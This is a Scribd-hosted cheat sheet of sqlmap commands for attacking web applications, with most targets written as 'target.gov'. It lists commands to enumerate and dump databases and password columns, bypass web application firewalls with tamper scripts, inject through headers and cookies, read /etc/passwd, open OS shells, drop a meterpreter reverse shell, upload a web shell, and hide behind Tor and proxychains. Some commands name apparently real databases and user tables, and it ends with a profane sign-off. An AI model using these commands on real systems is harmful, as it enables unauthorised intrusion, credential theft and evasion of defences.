0% found this document useful (0 votes)
176 views8 pages

Mapped

This document provides SQLmap commands for scanning and exploiting SQL injection vulnerabilities. It includes basic commands for database, table, and column enumeration as well as commands for bypassing web application firewalls using tamper scripts. The document also includes special commands for techniques like HTTP header injection, second-order SQLi, and authentication-based scanning.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
176 views8 pages

Mapped

This document provides SQLmap commands for scanning and exploiting SQL injection vulnerabilities. It includes basic commands for database, table, and column enumeration as well as commands for bypassing web application firewalls using tamper scripts. The document also includes special commands for techniques like HTTP header injection, second-order SQLi, and authentication-based scanning.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 8

SQLmap Special Command

old release : 21 June 2021


new update : 4 June 2022
cr3at0r by Omest

1. BASIC COMMAND SQLMAP


- sqlmap -u "target.gov" --dbs --batch

- sqlmap -u "target.gov" -D ( name database ) --columns --batch

- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) --columns --batch

- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) -C ( name column )


--dump --batch

2. WAF BYPASS TYPE


# all bypass waf forbidden
- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3

# waf bypass using tamper script


- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --
tamper="between,randomcase,space2comment" --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --


tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch

- sqlmap -u "target.gov/login" --data="userid=admin&passwd=admin" --method POST --


identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --
level=5 --risk=3 --dbs --batch

- sqlmap -u "target.gov" --level=5 --skip-waf --dbs --batch

- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --user-agent -v3 --batch


--threads=10 --dbs

- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --


tamper="space2mysqlblank.py" --dbs --batch

- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2comment"


--dbs --batch

- sqlmap -u "target.gov" -v3 --technique=T --no-cast --fresh-queries --banner --dbs


--batch

- sqlmap -u "target.gov" --level 2 --risk 3 --batch --dbs

- sqlmap -u "target.gov" -f -b --current-user --current-db --is-dba --users --dbs


--batch

- sqlmap -u "target.gov" --risk=3 --level=5 --random-agent --user-agent -v3 --batch


--threads=10 --dbs --batch

- sqlmap -u "target.gov" --risk 3 --level 5 --random-agent --proxy


http://127.0.0.1:5980 --dbs --batch
- sqlmap -u "target.gov" --random-agent --dbms=MYSQL --dbs --technique=B" --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch

- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --


tamper="between,randomcase,space2comment" --dbs --batch

- sqlmap -u "target.gov" --parse-errors -v 3 --current-user --is-dba --banner -D


eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --
risk=3 --batch

- sqlmap -u "target.gov" --threads=10 --dbms=MYSQL --tamper=apostrophemask --


technique=E -D joomlab -T anz91_session -C session_id --dump --batch

- sqlmap -u "target.gov" --tables -D miss_db --is-dba --threads="10" --time-sec=10


--timeout=5 --no-cast --

tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --
identify-waf --random-agent --batch

- sqlmap -u "target.gov" -v 3 --dbms "MySQL" --technique U -p id --batch --tamper


"space2morehash.py"

- sqlmap -u "target.gov" --banner --safe-url=2 --safe-freq=3 --


tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2
--risk=2 --batch

- sqlmap -u "target.gov" -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --


tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member
--columns --batch

- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --


tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,non
recursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,s
pace2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltou
nion,unmagicquotes --dbms=mssql --batch

- sqlmap -u "target.gov" --level 5 --risk 3


tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,gr
eatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityze
roversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphe
re,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomb
lank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforward
edfor --dbms=mssql --batch

- sqlmap -u "target.gov" --level 5 --risk 3


tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,non
recursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,s
pace2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltou
nion,unmagicquotes --dbms=mssql -batch

- sqlmap -u "target.gov" --level 5 --risk 3


tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,ch
arencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonr
ecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,spa
ce2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch

- sqlmap -u "target.gov" --level=5 --risk=3 -p "id" –-


tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,blu
ecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,gre
atest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzer
oversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomme
nts,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblan
k,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_
password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --
batch

- sqlmap -u "target.gov:80/search.cmd?form_state=1" –level=5 –risk=3 -p ‘item1’ –


tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,blue
coat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,grea
test,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzero
versioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcommen
ts,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank
,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_p
assword,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --
batch

-sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE"
--tables --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -
T "edt_usuarios" --columns --batch

- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-


port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -
T "edt_usuarios" -C "ud,email,usuario,contra" --dump --batch

- sqlmap -u "target.gov"
tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,mul
tiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.
py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldas
h.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --
dbms=mssql --batcH

# bypass 403 forbidden


- sqlmap -u "target.gov" -v3 --dbms="MySql" --risk=3 --level=3 --technique=BU --
tamper="space2mysqlblank.py" --random-agent --batch --dbs --no-cast --batch

# bypass 403 Not Acceptable


- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3 --batch

# bypass 500 internal server error


--sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned -v 3 --batch

# bypass waf dump table 500 internal server error


- sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned,multiplespaces.py
-v 3 --batch

# bypass waf Mod Security


- sqlmap -u "target.gov" --random-agent --tamper=modsecurityversioned --level=3 --
risk=3 -v 3 --dbs --batcH

3. SPECIAL COMMAND
# upload on header PUT
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

# retrieve information
- sqlmap -u "target.gov" --users --passwords --privileges --roles --threads=10 --
batch

# tajuk refferer
- sqlmap -u "target.gov" --headers="referer:*" --batch

# header injection to combination sql


- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch

# injection in header and other HTTP method


> inside cookie
- sqlmap -u "target.gov" --cookie "mycookies=*" --batch

> inside some HEADER


- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch
- sqlmap -u "target.gov" --headers="referer:*" --batch

> PUT method


- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

# Verbose
- sqlmap -u "target.gov" -v 3 --batch

# indicate string when injection is successfully


- sqlmap -u "target.gov" --string="string_showed_when_TRUE"

# scanning form
- sqlmap -u "target.gov" -u "target.gov/admin/login.php" --form --dbs --batch

# force ssl/https
- sqlmap -r a.req --force-ssl --users --batch

# specifiy parameter save request file


- sqlmap -r login.req -p Password --dbms=mssql -v 3 --batch --level 5 --risk 3 --
batch

# costumizing injection
> set a suffix injection
- sqlmap -u "target.gov/?id=1" -p id --suffix="-- " --batch
> set a prefix injection
- sqlmap -u "target.gov/?id=1" -p id --prefix="') " --batch

# second order injection


- sqlmap -r /tmp/r.txt --dbms MySQL --second-order "target.gov" -v 3 --batch
- sqlmap -r 1.txt -dbms MySQL -second-order
"http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs --batch
- sqlmap -r /root/Desktop/Burp.txt –second -order “target.gov” --batch

# running query sql


- sqlmap -u nz3666ghost.to/cat.php?id=2 –sql-shell --batch

# scanning page authentication HTTP ( Baci,NTLM,Digest )


- sqlmap -u http://example.com/admin.aspx –auth-type Basic –auth-cred “admin:
admin” --batch
# scanning page key basic
- sqlmap -u http://example.com/admin.aspx - auth-file = < certificate PEM or
Private key > --batch

# use network anonim TOR vpn


- sqlmap -u "target.gov/admin.aspx" –tor --batch
> set port tor
- sqlmap -u "target.gov/admin/aspx" –tor-port = <tor proxy port> --batch

# request delay HTTP


- sqlmap -u "target.gov/admin.aspx" –delay = delay 1 # 1 second --batch

# protection page of token CSRF ( Crossite Request Forgery )


- sqlmap -u "target.gov/admin.aspx" –csrf-token = <csrf token> --batch

# finding boolean injection


- sqlmap -r r.txt -p id --not-string ridiculous --batch

# request injection
- sqlmap -u "target.gov/test.php?id=1" -p id --batch
- sqlmap -u "target.gov/test.php?id=1" * --batch

# injection from file


- sqlmap -r request.txt --batch

# testing with pattern URL's


- sqlmap -u "target.gov/page/*/view" --dbs --batch

# using cookies
- sqlmap -u "target.gov/enter.php" --cookie="" -u "target.gov/index.php?id=1" --dbs
--batch

# identify current database


- sqlmap -u "target.gov/page.php?id=1" --current-db --batch

# multi threading
- sqlmap -u "target.gov/page.php?id=1" --dbs --threads 5 --batch

# null connection
- sqlmap -u "target.gov/page.php?id=1" --dbs --null-connection --batch

# HTTP persistant connection


- sqlmap -u "target.gov/page.php?id=1" --dbs --keep-alive --batch

# output prediction
- sqlmap -u "target.gov/page.php?id=1" -D database -T user -c users,password --dump
--predict-output --batch

# checking privilages
- sqlmap -u "target.gov/page.php?id=1" --privileges --batch

# reading file from server


- sqlmap -u "target.gov/page.php?id=1" --file-read=/etc/passwd --batch

# using proxxy
- sqlmap --proxy="127.0.0.1:8080" -u "target.gov/page.php?id=1" --dbs --batch

# using proxxy with credentials


- sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u
"target.gov/page.php?id=1" --batch

4. CRAWLING INJECTION
- sqlmap -u "target.gov" --crawl=1 --forms --dbs --batch

- sqlmap -u "target.gov" --crawal=10 --forms --dbs --batch

- sqlmap -u "target.gov" --crawl=2 --forms --dbs --batch

- sqlmap --threads 10 --batch --crawl 1 --forms -u "target.gov" --tamper


space2comment --dbs --batch

- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --


level=5 --risk=3

- sqlmap -u "target.gov" –crawl = 3 –cookie = "" –crawl-exclude = "logout" --batch

- sqlmap -u "target.gov" --dbms=mysql --crawl=3 --batch

- sqlmap -u "<targetip>" --forms --batch --crawl=10 --cookie=jsessionid=54321 --


level 4 --risk 3 --batch

- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --


level=5 --risk=3

5. SQL POST DATA


- sqlmap -u "target.gov" --data="email=omest&password=omest" --method POST --dbs --
batch

6. PARAMETER INJECTION
- sqlmap -u "target.gov" --banner --dbs --batch

7. BURPSUITE/SANDROPROXXY > SQLMAP


> POST request
- sqlmap -r target.txt -p username --batch
- sqlmap -r target.txt -p username --dump --batch

> capture request and create req.txt file


- sqlmap -r req.txt --current-user --batch

> GET request injection


- sqlmap -u "target.gov" -p id --batch
- sqlmap -u "http://example.com/?id=*" -p id --batch

> POST request injection


- sqlmap -u "target.gov" --data "username=*&password=*" --dbs --batch

8. SQLMAP OS SHELL
> basic operating system shell ( Linux )
- sqlmap -u "target.gov/leet.php?id=1337" --os-shell --batch

> basic operating system command prompt ( Windows )


- sqlmap -u "target.gov/leet.php?id=1337" --os-cmd ( command windows ) --batch

> simple shell


- sqlmap -u "target.gov/?id=1" -p id --os-shell --batch

> exec command os windows


- sqlmap -u "target.gov/?id=1" -p id --os-cmd whoami
> dropping reverse shell ( meterpreter )
- sqlmap -u "target.gov/?id=1" -p id --os-pwn --batch
--file-read=/etc/passwd ( read file )

> os uploading shell


- sqlmap -u "target.gov/page.php?id=1" --file-write=path/shell.php --file-
dest=path/shell.php --batch

> os write commad


- sqlmap -u "target.gov/page.php?id=1" --os-shell --batch
after successfully get OS shell
write some file, example
echo "leet" >> haxor.txt

> os shell cookies injection and skipping waf


- sqlmap -u "target.gov/pussy.php?cat=123" --threads=10 --cookie="cookies" --skip-
waf --os-shell --batch

9. SQLMAP WITH PROXYCHAINS ( TOR )


> update and upgrade
- sudo apt-get update;sudo apt-get upgrade

> install proxychains & tor


- sudo apt-get purge proxychains;sudo apt-get purge proxychains4;sudo apt-get
purge tor
- sudo apt-get install proxychains4;sudo apt-get install proxychains;sudo apt-get
install tor
- which proxychains;which proxychains4;which tor

> setting configuration proxychains using text editor terminal like nano,vim,micro
and etc
- micro /etc/proxychains.conf
WARNING !
listen
delete hastag coment ( # ) in dynamic_chain, and add hastag coment ( # ) in
strict_chain one more and delete hastag coment ( # ) in random_chain

add socks5 below socks4


example
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050 ( here add new socks with socks5 like this )

fix line in hastag coment # proxylist format, example you just space line so that
it is parallel
and then save file configuration

- start tor with command sudo service tor start


- check status tor active with command sudo service tor status

and last run sqlmap tool with proxychains

dian@blackhat:~# proxychains sqlmap -u "target.gov" --dbs --batch

DONE
thanks bitch, i'm so tired write this tutorials fuck!!!

You might also like